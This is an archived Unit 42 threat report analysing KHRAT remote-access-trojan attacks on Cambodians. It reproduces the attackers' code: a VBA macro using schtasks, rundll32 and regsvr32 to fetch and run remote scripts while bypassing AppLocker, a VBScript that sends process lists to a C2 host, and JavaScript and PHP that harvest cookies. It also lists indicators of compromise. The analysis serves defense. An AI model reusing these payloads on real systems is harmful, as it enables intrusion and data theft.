{
	"id": "77501a48-18ee-434b-a565-249cae0f0890",
	"created_at": "2026-04-06T01:32:28.91721Z",
	"updated_at": "2026-04-10T03:31:13.773225Z",
	"deleted_at": null,
	"sha1_hash": "5a994e6e9519a4d391aeda64d54bd6dbaae4d0e6",
	"title": "Updated KHRAT Malware Used in Cambodia Attacks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1281536,
	"plain_text": "Updated KHRAT Malware Used in Cambodia Attacks\r\nBy Alex Hinchliffe, Jen Miller-Osborn\r\nPublished: 2017-08-31 · Archived: 2026-04-06 00:46:57 UTC\r\nIntroduction\r\nUnit 42 recently observed activity involving the Remote Access Trojan KHRAT used by threat actors to target the\r\ncitizens of Cambodia.\r\nSo called because the Command and Control (C2) infrastructure from previous variants of the malware was\r\nlocated in Cambodia, as discussed by Roland Dela Paz at Forcepoint here, KHRAT is a Trojan that registers\r\nvictims using their infected machine’s username, system language and local IP address. KHRAT provides the\r\nthreat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities,\r\nremote shell access and so on.\r\nThis report covering contemporary variants of KHRAT, discusses updated techniques and a recent attack affecting\r\nCambodians, including:\r\nUpdated spear phishing techniques and themes;\r\nMultiple techniques to download and execute additional payloads using built-in Windows applications;\r\nExpanded infrastructure mimicking the name of the well-known cloud-based file hosting service, Dropbox;\r\nCompromised Cambodian government servers.\r\nIn its various forms, including document files, executables and dynamic link libraries, KHRAT is not very\r\nprevalent with just over fifty network sessions seen across our sensors since the start of the year, with a slight\r\nuptick\r\nvisible in the last couple of months.\r\nAttack Delivery\r\nOn June 21, 2017, a Word document was uploaded to Wildfire, determined to be malicious and visible in\r\nAutofocus with some interesting malicious behavior tags, namely AppLockerBypass, CreateScheduledTask and\r\nRunDLL32_JavaScript_Execution, a private tag contributed by Squadra Solutions. There were also some\r\nindications this file was related to the actors using KHRAT malware.\r\nThe weaponized document (SHA256: c51fab0fc5bfdee1d4e34efcc1eaf4c7898f65176fd31fd8479c916fa0bcc7cc),\r\nwith the filename “Mission Announcement Letter for MIWRMP phase 3 implementation support mission, June\r\n26-30, 2017(update).doc”, was shown in AutoFocus as contacting a Russian IP address 194.87.94[.]61 over port\r\n80 in the form of a HTTP GET request to update.upload-dropbox[.]com – a site that could (erroneously) be\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 1 of 20\n\nthought of as belonging to the well-known cloud-based file hosting service, Dropbox, and as such is intended to\r\ntrick victims and network defenders into thinking, at least at first glance, the C2 traffic is legitimate.\r\nThe acronym MIWRMP refers to the Mekong Integrated Water Resources Management Project – a multi-million\r\ndollar, World Bank funded project relating to effective water resource and fisheries management in North Eastern\r\nCambodia, which happens to be in its third phase – matching the document’s filename. Again, the attackers took\r\nsteps to make the malware appear to be a legitimate file.\r\nFigure 1 below shows the document, together with the social engineering techniques employed to lead the victim\r\ninto enabling the macro content and running the VBA code. For all intents and purposes this is a Word document,\r\nespecially considering the file extension, however, underneath it’s a multipart MIME file that could also be treated\r\nas XML.\r\nSuch files are often created when saving Microsoft Office content as MHTML (MIME HTML) files – a web page\r\narchive format used to combine in a single document the HTML code and its companion resources objects – or,\r\nwhen sending a HTML messages using very old versions of Outlook, but is by no means a new technique.\r\nFor more details about this format, which includes the OLE document and its macros in a zlib-compressed, base-64 encoded data part, please refer to the appendix further down.\r\nFigure 1: Weaponized Word document referring to MIWRMP phase 3\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 2 of 20\n\nOnce Word has rendered the document, and the macro content has been enabled, the VBA code, which exists as\r\npart of the “Open” macro, will run automatically.\r\nImmediately the victim would see the document contents change to display, simply, \"Because your Office version\r\nisn't compatible with the document, it can't be opened, according to the prompts to open the compatibility mode\r\nand then you can continue to view the document.\", as shown in Figure 2 below.\r\nFigure 2: Word document contents post VBA macro execution\r\nPerhaps conducted as a distraction technique making the victim believe there truly is a compatibility issue. This\r\ncould be the perception, especially considering nothing untoward happens elsewhere on the system.\r\nThe VBA code from the document’s macro, shown in Figure 3 below, describes the malicious behavior. Line 6 of\r\nthe code creates a new scheduled task using the CLI program schtasks.exe (CreateScheduledTask) together with\r\nthe associated parameters, including rundll32.exe and JavaScript parameters (RunDLL32_JavaScript_Execution),\r\nwhich is a known method for tricking rundll32.exe into loading the mshtml.dll library, calling the exported\r\nfunction RunHTMLApplication, and having it execute the subsequent JavaScript code. We will cover this in more\r\ndetail later on.\r\nThe AutoFocus tag CreateScheduledTask indicates that a given application, irrespective of malicious\r\nclassification, is capable of created tasks for the Windows scheduler to execute. This is often used by malware for\r\nmaintaining persistence or in some cases to aid spreading throughout a network using remote hosts’ scheduler to\r\nexecute payloads. Since the start of this year this behavior has been seen very consistently during dynamic\r\nanalysis of malware, averaging over three thousand malicious\r\n sessions per day containing malware using this technique, and spiking towards the end of July, as per the\r\nsparkline chart above, to between twenty and forty thousand sessions each day in one week.\r\nThroughout the year the number of malware samples exhibiting the behavior relating to the\r\nRunDLL32_JavaScript_Execution AutoFocus tag has been seen much, much smaller compared to\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 3 of 20\n\nCreateScheduledTask. Averaging about one malicious session per day -\r\nin reality small groups of samples in the same day or week, spread over the year – this technique was last seen\r\naround the date of the KHRAT activity discussed in this report.\r\nAs mentioned previously, AutoFocus also tagged the document file as exhibiting a malicious behavior named\r\n“AppLockerBypass”, which relates to a technique discovered last year, whereby regsvr32.exe – a command-line\r\ntool that registers .DLL files as command components in the Windows registry – can download and execute\r\nscripts within XML files hosted on URLs. This technique works on many versions of Windows Operating System\r\nand, because regsvr32.exe is an allowlisted, trusted binary on the Windows, it can be used to download and\r\nexecute programs that would otherwise be prevented by AppLocker policies or rules. Line 7 of the code performs\r\nthis activity.\r\nThe AppLockerBypass tag has seen slightly more frequently than RunDLL32_JavaScript_Execution but also\r\ndropped off completely in the last couple of months.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\nPrivate Sub Document_Open()\r\nDim oShell, office_text As String\r\nOn Error Resume Next\r\nSet oShell = CreateObject(\"WSCript.shell\")\r\noShell.Run \"schtasks /create /sc MINUTE /tn \"\"fuck you\"\" /tr \" \u0026amp; _\r\n           \"\"\"rundll32 javascript:\\\"\"\\..\\mshtml,RunHTMLApplication\r\n\\\"\";document.write();try{GetObject(\\\"\"script:http://update.upload-dropbox[.]com/images/rtf/logo33_bak.ico\\\"\");}catch(e){};window.close()\"\"\" \u0026amp; _\r\n           \" /mo 10 /F\"\"\", 0\r\noShell.Run \"regs\" \u0026amp; _\r\n           \"vr32.exe /s /n /u /i:http://update.upload-dropbox[.]com/images/rtf/logo33.ico scro\" \u0026amp; _\r\n           \"bj.dll\", 0\r\nSet oShell = Nothing\r\noffice_text = \"Because your Office version isn't compatible with the document, it can't be opened,\r\naccording to the prompts to open the compatibility mode and then you can continue to view the\r\ndocument.\"\r\nActiveDocument.Range.Text = office_text\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 4 of 20\n\nEnd Sub\r\nFigure 3: VBA Macro code from the weaponised document\r\nAt the time of writing logo33_bak.ico and logo33.ico files referenced in the VBA macro code were unavailable\r\nand, as of now, it’s not known exactly their contents or purpose, however, judging by other .ico files downloaded\r\nin similar ways from related components of KHRAT malware, it’s fair to assume they would include methods to\r\nadd further persistence to the actor’s attack, or install further payloads towards their objectives.\r\nDuring dynamic analysis of this malicious document, and downloaded payloads, in our Wildfire sandbox,\r\nmodifications were also made to the Windows registry. Specifically, the MRU (Most Recently Used) list of\r\ndocuments opened using Microsoft Word was updated such that all items referenced each of the filenames listed\r\nbelow. This would mean that should the victim load any documents from their most recently used document list,\r\nWord would open the malicious document again.\r\nQQYXDK0tQH.docm\r\nMGm.docx\r\n9sxAwWnA.docm\r\n8Y0kVy.doc\r\nW4.docm\r\noDF.docx\r\nMk3tj.doc\r\n77ajEQp0fn.docx\r\neSjo0J.doc\r\nbp8OB7.docx\r\nY.docx\r\npjuhm0HWeKE.doc\r\nWktDOjyzu.docm\r\nThe registry key modified is shown below where \u003cversion\u003e would relate to the version of office installed, e.g.\r\n14.0, and \u003cnumber\u003e would relate to the most recent document list. In the case of KHRAT the first 14 MRU items\r\nwere updated:\r\n1 HKCU\\Software\\Microsoft\\Office\\\u003cversion\u003e\\Word\\File MRU\\Item \u003cnumber\u003e\r\nFake “Dropbox” Infrastructure\r\nPivoting using the data points discussed thus far, such as the domain name update.upload-dropbox[.]com, the\r\nRussian IP address, or indeed the registrant email address for the domain – the misspelt\r\nmail.noreoly@gmail[.]com – provide an insight into the initial infrastructure supporting this campaign. Figure 4\r\nbelow shows this infrastructure with some key points numbered.\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 5 of 20\n\nSample (1) relates to the document, described earlier in this report, and shows the connection to the domain\r\nupdate.upload-dropbox[.]com, also previously discussed, as well as to the Russian IP address 194.87.94[.]61.\r\nFigure 4 below shows another (2) sample’s connection to the update.upload-dropbox[.]com domain, and also as\r\nhaving been hosted on the compromised Cambodian Government’s website, redacted in the figure.\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 6 of 20\n\nFigure 4: Initial infrastructure relating to fake Dropbox sites\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 7 of 20\n\nAdditional research into upload-dropbox[.]com uncovered samples beaconing to third levels of both it and inter-ctrip[.]com, as well as PDNS overlaps between multiple third levels of each domain. inter-trip[.]com has\r\npreviously been reported as a C2 related to this activity. As with the fake drobox domain intended to trick victims\r\nand defenders by closely mimicking a legitimate website, the actor-registered inter-ctrip[.]com is very similar to\r\ntwo legitimate travel websites, ctrip.com and intertrips.com. Ctrip is a China-based travel provider, while\r\nInterTrips is a US-based travel provider focusing on travel to Asia. While researching the infrastructure we also\r\nfound an additional malicious domain not previously reported, vip53[.]cn. As with the aforementioned two\r\ndomains, it is actor-registered and has multiple third level domains being used as C2s.\r\nAll of the IPs to which these C2 domains resolved, when it was possible to identify the owner, are tied to either\r\nVPS providers or legitimate but compromised infrastructure. In two cases we were able to identify what appear to\r\nbe compromised wireless devices, with one in Vietnam and one in Singapore.\r\nInstallation \u0026 Persistence\r\nKHRAT Dropper\r\nSample (2) (SHA256:53e27fd13f26462a58fa5587ecd244cab4da23aa80cf0ed6eb5ee9f9de2688c1) is a very small\r\n– 2,560 byte – Portable Executable (PE) file hosted on the compromised government servers, and downloaded in\r\nweb-browsing sessions by organizations based in Cambodia. According to AutoFocus, these sessions indicated the\r\nEXE filename was either ‘news’ or ‘logo’ and, in both cases, the extension was ‘.jpg’.\r\nThe Microsoft Visual C++ compiled program ‘news.jpg’ simply calls the WinExec Windows API to launch\r\nanother application – regsvr32.exe – passing the parameters shown in Figure 5 below, before exiting. As you can\r\nimagine, such activity is tagged in AutoFocus, just like the document sample exhibiting the same behavior, as\r\n“AppLockerBypass”.\r\nFigure 5: news.jpg code to execute regsvr32.exe with malicious XML/VBS script.\r\nThis variant of KHRAT runs regsvr32.exe using the ‘/I’ option to pass a command line – the URL in this case – as\r\na parameter when registering scrobj.dll – Microsoft's Script Component Runtime.  Regsvr32.exe will download\r\nlogo.ico – an XML registration script – from update.upload-dropbox[.]com. The contents of logo.ico includes a\r\nVBS script to harvest a list of running processes from the system using the Windows Management\r\nInstrumentation (WMI). This list is then sent as a HTTP POST to the PHP script http://update.upload-dropbox[.]com/docs/tz/GetProcess.php. At the time of writing, this POST provided no response from the server\r\nand may have been simply for further reconnaissance and information gathering, or to provide further payloads.\r\nFor more information about this logo.ico, please see the “Reconnaissance” appendix.\r\nAnother component related to the campaign is sample (4) (SHA256:\r\nc0baa57cbb66b8a86aac7d4eeab7a0dc1ecfb528d8e92a45bdb987d1cd5cb9b2) shown in Figure 4 above. This PE\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 8 of 20\n\nexecutable attempts to download http://update.upload-dropbox[.]com/images/flash/index.ico, which is shown in\r\nFigure 6 below, highlighting their consistent use of techniques to remain persistent and download further\r\nmalicious components.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n\u003c?XML version=\"1.0\"?\u003e\r\n\u003cscriptlet\u003e\r\n\u003cregistration progid=\"ff010f\" classid=\"{e934870c-b429-4d0d-acf1-eef338b92c4b}\" \u003e\r\n\u003cscript language=\"vbscript\"\u003e\r\n\u003c![CDATA[\r\nCreateObject(\"WScript.Shell\").Run \"schtasks /create /sc MINUTE /tn \"\"Windows Scheduled\r\nMaintenance1\"\" /tr \"\"\\\"\"regsvr32.exe\\\"\" /s /n /u /i:http://update.upload-dropbox[.]com/images/flash/reg.ico scrobj.dll\"\" /mo 4 /F\"\"\"\r\nCreateObject(\"WScript.Shell\").Run \"schtasks /create /sc MINUTE /tn \"\"Windows Scheduled\r\nMaintenance2\"\" /tr \"\"\\\"\"regsvr32.exe\\\"\" /s /n /u /i:http://update.upload-dropbox[.]com/images/flash/reg_salt.ico scrobj.dll\"\" /mo 20 /F\"\"\"\r\nCreateObject(\"WScript.Shell\").Run \"schtasks /create /sc MINUTE /tn \"\"Windows Scheduled\r\nMaintenance3\"\" /tr \"\"\\\"\"regsvr32.exe\\\"\" /s /n /u /i:http://update.upload-dropbox[.]com/images/flash/reg_bak.ico scrobj.dll\"\" /mo 10 /F\"\"\"\r\nCreateObject(\"WScript.Shell\").Run \"rundll32.exe javascript:\"\"\\..\\mshtml,RunHTMLApplication\r\n\"\";document.write();try{GetObject(\"\"script:http://update.upload-dropbox[.]com/images/flash/run.ico\"\");}catch(e){};window.close()\"\r\n]]\u003e\r\n\u003c/script\u003e\r\n\u003c/registration\u003e\r\n\u003c/scriptlet\u003e\r\nFigure 6: index.ico downloaded by another KHRAT component\r\nIndex.ico would create three scheduled tasks with the more subtly named “Windows Scheduled Maintenance1”\r\n(Maintenance2 and Maintenance3), although three services with incremented numbers in their names is also a\r\nlittle suspicious, and use regsvr32.exe to download and execute three other .ico files – reg.ico, reg_salt.ico and\r\nreg_bak.ico – the purposes of which are currently unknown. It’s worth noting each service has different running\r\nfrequencies – every 4 minutes, 20 minutes and 10 minutes, respectively, which could indicate a dependency on\r\nreg.ico, as it is more aggressively sought after, or that is a more critical component to have running.\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 9 of 20\n\nThe VBS Script code in index.ico, shown in Figure 6, performs one final command that abuses the\r\naforementioned trick of rundll32.exe to attempt to download run.ico from http://update.upload-dropbox[.]com/images/flash. Unfortunately, all four of these .ico files are unavailable at the time of writing.\r\nKHRAT DLL\r\nAt the time of writing a DLL component was not downloaded and executed, however, AutoFocus makes it clear,\r\nas shown in Figure 7, that during the Wildfire detonation of one of the droppers in June, a DLL component is\r\npresent and called using rundll32.exe (as it was intended this time) to run the DLL – WIN.DAT – passing the\r\nparameters K1 or K3 depending on the function required by the caller.\r\nFigure 7: Wildfire detonation results showing KHRAT DLL being called.\r\nFurthermore, the registry activity gathered from Wildfire indicates a persistence mechanism whereby the DLL will\r\nbe loaded via a Registry Run key, passing K1 as the parameter, as shown in Figure 8 below.\r\nFigure 8: Wildfire detonation results showing persistence mechanism using the registry\r\nAlthough no DLL sample was available at the time of writing, sample (3) (SHA256:\r\nde4ab35a2de67832298f5eb99a9b626a69d1beca78aaffb1ce62ff54b45c096a), shown in Figure 4, is a DLL that has\r\nbeen linked to the campaign and had been seen in Wildfire exhibiting behaviors as described here.\r\nChinese Developer Network click-tracker\r\nDuring investigation of the KHRAT dropper code responsible for sending process lists to http://update.upload-dropbox[.]com/docs/tz/GetProcess.php, I reviewed some of the responses and content received. Working my way\r\nfrom the root of the site backwards to the GetProcess.php script I encountered a mixture of HTTP 500 – Internal\r\nServer Error and HTTP 403 – Forbidden messages from the server, however, when browsing the root of the /tz/\r\nfolder, I noticed an interesting one-line HTML code snippet loading a JavaScript from http://doc.upload-dropbox[.]com/docs/tz/probe_sl.js.\r\nThe JavaScript code in probe_sl.js uses a click-tracking technique, presumably so the actors can monitor who is\r\nvisiting their site. It may also be an attempt to control the distribution of later stage malware and tools, by only\r\nsending it in response to requests from desired victims or vulnerable systems, and dropping requests from others\r\nsuch as researchers. The data gathered by the code includes the user-agent, domain, cookie, referrer and flash\r\nversion, which are sent in a HTTP GET request to probe_sl.php, a PHP script located in the same folder as the\r\nJavaScript on the server.\r\nInterestingly the JavaScript code appears almost identical to that found on a blog hosted on the Chinese Software\r\nDeveloper Network (CSDN) website. The blog, entitled “XSS信息刺探脚本” (translation: XSS information\r\nspying script) and written by eT48_Sec, provides not only the JavaScript code to gather the tracking information\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 10 of 20\n\nbut also the PHP server-side code to receive and save the information to disk. The HTML-formatted contents of\r\nthe file containing the tracked information, entitled \"Sensitive Information\", would look like the example shown\r\nin Figure 9 below. For more information about the code used in this click-tracker, please see the “CSDN Click\r\nTracker” appendix.\r\nFigure 9: data.html from the actor’s server, as viewed in a web-browser\r\nConclusion\r\nThe threat actors behind KHRAT have evolved the malware and their TTPs over the course of this year, in an\r\nattempt to produce more successful attacks, which in this case included targets within Cambodia.\r\nThis most recent campaign highlights social engineering techniques being used with reference and great detail\r\ngiven to nationwide activities, likely to be forefront of peoples’ minds; as well as the new use of multiple\r\ntechniques in Windows to download and execute malicious payloads using built-in applications to remain\r\ninconspicuous which is a change since earlier variants.\r\nOther notable actions by the threat actors included updated infrastructure purporting to be part of either the well-known cloud-based company, Dropbox, or a travel agency, likely to appear genuine, masquerading traffic under\r\nthe premise of other applications to communicate with the attack infrastructure, some of which included\r\ncompromised Cambodian Government servers. The attackers use of the click-tracking software on their C2\r\ndomain lets them track both intended victims and researchers who have discovered the activity, which is not\r\nsomething we have found to date in use by many groups.\r\nWe believe this malware, the infrastructure being used, and the TTPs highlight a more sophisticated threat actor\r\ngroup, which we will continue to monitor closely and report on as necessary.\r\nPalo Alto Networks customers are protected and may learn more via the following:\r\nSamples are classified as malicious by WildFire and Traps prevents their execution.\r\nDomains and IPs have been classified as malicious and IPS signatures generated.\r\nAutoFocus users may learn more via the KHRAT tag.\r\nIndicators of Compromise\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 11 of 20\n\nKHRAT Delivery Document:\r\nc51fab0fc5bfdee1d4e34efcc1eaf4c7898f65176fd31fd8479c916fa0bcc7cc\r\nKHRAT Dropper:\r\n53e27fd13f26462a58fa5587ecd244cab4da23aa80cf0ed6eb5ee9f9de2688c1\r\nKHRAT Payload:\r\nc0baa57cbb66b8a86aac7d4eeab7a0dc1ecfb528d8e92a45bdb987d1cd5cb9b2\r\nKHRAT DLL:\r\nde4ab35a2de67832298f5eb99a9b626a69d1beca78aaffb1ce62ff54b45c096a\r\nRelated infrastructure\r\nupload-dropbox[.]com\r\nupdate.upload-dropbox[.]com\r\ndoc.upload-dropbox[.]com\r\ndate.upload-dropbox[.]com\r\nftp.upload-dropbox[.]com\r\ninter-ctrip[.]com\r\nkh.inter-ctrip[.]com\r\nbit.inter-ctrip[.]com\r\ncookie.inter-ctrip[.]com\r\nhelp.inter-ctrip[.]com\r\ndcc.inter-ctrip[.]com\r\ntravehappy.inter-ctrip[.]com\r\nonline.inter-ctrip[.]com\r\nupgrade.inter-ctrip[.]com\r\nvip53[.]cn\r\ndns.vip53[.]cn\r\nftp.vip53[.]cn\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 12 of 20\n\nmail.vip53[.]cn\r\nnc.vip53[.]cn\r\nnz.vip53[.]cn\r\nsl.vip53[.]cn\r\nsz.vip53[.]cn\r\nyk.vip53[.]cn\r\nAppendix\r\nDelivery Document\r\nAs mentioned earlier, the delivery document contained VBA code (Figure 3) to download and install further\r\nmalicious payloads using AppLockerBypass and RunDLL32_JavaScript_Execution techniques, abusing built-in,\r\ntrusted Microsoft applications.\r\nThe document, as shown in Figure 10, is multipart MIME file created when saving Microsoft Office content as\r\nMHTML (MIME HTML) files – a web page archive format used to combine in a single document the HTML\r\ncode and its companion resources.\r\nFigure 10: multipart MIME Document format\r\nEmbedded files, such as the images in the document itself, are stored in  MIME as base64 encoded data. The most\r\ninteresting of all the encoded data sections, representing the original OLE Document and associated VBA macros,\r\nis the one shown in Figure 11 – editdata.mso. The MSO file type is created when saving an Office document as a\r\nwebpage, and the data is base64 encoded.\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 13 of 20\n\nFigure 11: MSO object containing the OLE Document and VBA macros.\r\nFigure 12 below shows the base64 content decoded to reveal the ActiveMime wrapper, which is ZLIB\r\ncompressed, as per the magic bytes at offset 0x32. Once decompressed, the traditional OLE object and header\r\n(0xD0CF1LE0), as shown in Figure 13, is revealed.\r\nFigure 12: ActiveMime ZLIB wrapper\r\nFigure 13: Decompressed data showing the OLE object.\r\nThe VBA macro code performs several functions, the first of which is to create a scheduled task, as show in\r\nFigure 14 below. The task will launch rundll32.exe every 10 minutes, indefinitely, passing similar parameters as\r\ndiscussed earlier to have rundll32.exe execute JavaScript code to download and execute the contents of\r\nhttp://update.upload-dropbox[.]com/images/rtf/logo33_bak.ico.\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 14 of 20\n\nFigure 14: Windows Task Scheduler showing the malicious task\r\nReconnaissance\r\nAfter execution, the dropper executable, as shown in Figure 5, uses the AppLockerBypass technique to download\r\nand execute the XML content shown below in Figure 15. The XML content contains VBScript code capable of\r\nenumerating all running processes and sending the resultant information to a PHP script on a remote host.\r\nAll process names enumerated are stored in a newline-delimited (Chr(13) and Chr(10)) string object where each\r\nline is padded with spaces (Chr(32)). The text list is then transmitted over a HTTP POST to a PHP script hosted at\r\nthe following location: http://update.upload-dropbox[.]com/docs/tz/GetProcess.php. Note also that the final line of\r\nthe VBS code in Figure 15 shows a commented-out debug statement to print the response text from POST request.\r\nDuring investigation, the response from the server appeared to be blank.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n\u003c?xml version=\"1.0\"?\u003e    \r\n\u003ccomponent\u003e\r\n\u003cscript language=\"VBScript\"\u003e\r\n\u003c![CDATA[\r\non error resume next\r\nDim http,WMI,Objs,Process\r\nSet WMI=GetObject(\"WinMgmts:\")\r\nSet Objs=WMI.InstancesOf(\"Win32_Process\")\r\nProcess=\"\"\r\nFor Each Obj In Objs\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 15 of 20\n\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n  Process=Process \u0026 Chr(32) \u0026 Chr(32) \u0026 Chr(32) \u0026 Obj.Description \u0026 Chr(13) \u0026 Chr(10)\r\nNext\r\nSet http = CreateObject(\"Msxml2.ServerXMLHTTP\")\r\nhttp.open \"POST\", \"http://update.upload-dropbox[.]com/docs/tz/GetProcess.php\",False,\"\",\"\"\r\nhttp.SetRequestHeader \"Content-Type\", \"application/json\"\r\nhttp.send Process\r\n'WScript.Echo http.responseText\r\n]]\u003e\r\n\u003c/script\u003e    \r\n\u003c/component\u003e\r\nFigure 15: XML script logo.ico, containing VBS code, for regsvr32.exe to execute\r\nCSDN Click-tracker\r\nIn the root of the /tz/ folder on the server where the GetProcess.php file was located, a small HTML code snippet\r\nexecuted JavaScript from the http://doc.upload-dropbox[.]com/docs/tz/probe_sl.js.\r\nFigure 16 below shows the contents of the JavaScript, which gathers information from the web-browser visiting\r\nthe site including the referring URL, flash version, cookie, domain and the user agent. The collected information\r\nis transmitted to another PHP script via a HTTP GET request.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\nvar http_server = \"http://doc.upload-dropbox[.]com/docs/tz/probe_sl.php\";\r\nfunction getFlashVersion() {\r\n     var flashVer = NaN;\r\n     var ua = navigator.userAgent;\r\n     if (window.ActiveXObject) {\r\n         var swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');\r\n         if (swf) {\r\n             flashVer = Number(swf.GetVariable('$version').split(' ')[1].replace(/,/g,\r\n'.').replace(/^(d+.d+).*$/, \"$1\"));\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 16 of 20\n\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n         }\r\n     } else {\r\n         if (navigator.plugins \u0026\u0026 navigator.plugins.length \u003e 0) {\r\n             var swf = navigator.plugins['Shockwave Flash'];\r\n             if (swf) {\r\n                 var arr = swf.description.split(' ');\r\n                 for (var i = 0, len = arr.length; i \u003c len; i++) {\r\n                     var ver = Number(arr[i]);\r\n                     if (!isNaN(ver)) {\r\n                         flashVer = ver;\r\n                         break;\r\n                     }\r\n                 }\r\n             }\r\n         }\r\n     }\r\n     return flashVer;\r\n}\r\nvar user_agent = navigator.userAgent;\r\nvar domain = document.domain;\r\nvar cookie = document.cookie;\r\nvar referrer = document.referrer;\r\nvar flash = getFlashVersion();\r\nwindow.onload = function(){\r\nnew Image().src = http_server + \"?\r\nua=\"+user_agent+\"\u0026domain=\"+domain+\"\u0026cookie=\"+cookie+\"\u0026referrer=\"+referrer+\"\u0026flash=\"+flash;\r\n}\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 17 of 20\n\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\nFigure 16: JavaScript click-tracking code\r\nAs mentioned earlier, the JavaScript click-tracking code in Figure 16, appeared to be identical to that published to\r\nthe Chinese Software Developer Network in China. Figure 17 below shows that only a few minor differences exist\r\nbetween the blog code and the code downloaded from the actor’s website. Having adjusted some minor white-space character differences, and converted the blog’s code from Linux line-ending format (LF) to Windows format\r\n(CRLF), to match that of the actors, the only differences are:\r\n1. A different URL to send the HTTP GET request\r\n2. An additional data point – referrer – to collect information about where the visitor came from before hitting\r\ntheir site.\r\n3. Updates to the URL query string:\r\na.The addition of the new referrer information.\r\nb. Fixing a bug in the author’s code whereby the flash variable, which relates to the version of flash the visitor has\r\ninstalled in their web-browser, was omitted from the query string.\r\nFigure 17: JavaScript click-tracking code diff vs a CSDN blog\r\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\r\nPage 18 of 20\n\n---\ntitle: Sensitive Information\n---\nThe CSDN blog post also included PHP code, shown in Figure 18, capable of receiving the HTTP GET request\nfrom the click-tracking JavaScript code and persisting it to data.html on the web server.\n1\n2\n3\n4\n5\n6\n7\n8\n9\n10\n11\n12\n13\n14\n15\n16\n17\n18\n19\n20\n21\n22\n?php\n@header(\"Content-Type:text/html;charset=utf-8\");\n$ip = $_SERVER['REMOTE_ADDR'];\n$time = date(\"Y-m-d H:i:s\");\n$data = \"\";\n$data .= (\"IP: \".$ip.\"  \nTime: \".$time.\"  \n\");\nif(!empty($_GET['domain'])){$data .= \"Domain: \"; $data .= $_GET['domain']; $data.=\"  \n\";}\nif(!empty($_GET['ua'])){$data .= \"User_Agetn: \"; $data .= $_GET['ua']; $data.=\"  \n\";}\nif(!empty($_GET['cookie'])){$data .= \"Cookie: \"; $data .= $_GET['cookie']; $data.=\"\n\n\";}\nif(!file_exists(\"data.html\")){\n$fp = fopen(\"data.html\", \"a+\");\nfwrite($fp, '');\nfclose($fp);\n}\n$fp = fopen(\"data.html\", \"a+\");\nfwrite($fp, $data);\nfclose($fp);\n?\u003e\nFigure 18: PHP code to save the click-tracking information\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\nPage 19 of 20\n\n---\ntitle: Sensitive\nInformation\n---\nUnable to see the contents of the PHP code on the actor’s server, but assuming they copied the code from CSDN, I\nchecked for the presence of data.html, which existed. Furthermore, it had the exact structure the PHP code in\nFigure 18 would have created.\nInterestingly however, two crucial updates made to the JavaScript click-tracking seem not to have been\nimplemented in the actor’s PHP code yet, namely difference 2. and 3 shown in Figure 17. Yet the actors did\nmanage to fix a spelling mistake in the CSDN blog’s code, by updating the print statement User_Agetn to\nUser_Agent. Figure 19 below shows an output data.html example.\n1\nIP: [REDACTED]  \nTime: 2017-08-\n09 13:33:19  \nDomain: update.upload-dropbox[.]com  \nUser_Agent: Mozilla/5.0 (Windows NT 6.1;\nWOW64; rv:55.0) Gecko/20100101 Firefox/55.0  \nFigure 19: data.html from the actor’s server showing my information\nSource: https://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\nhttps://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-updated-khrat-malware-used-in-cambodia-attacks/"
	],
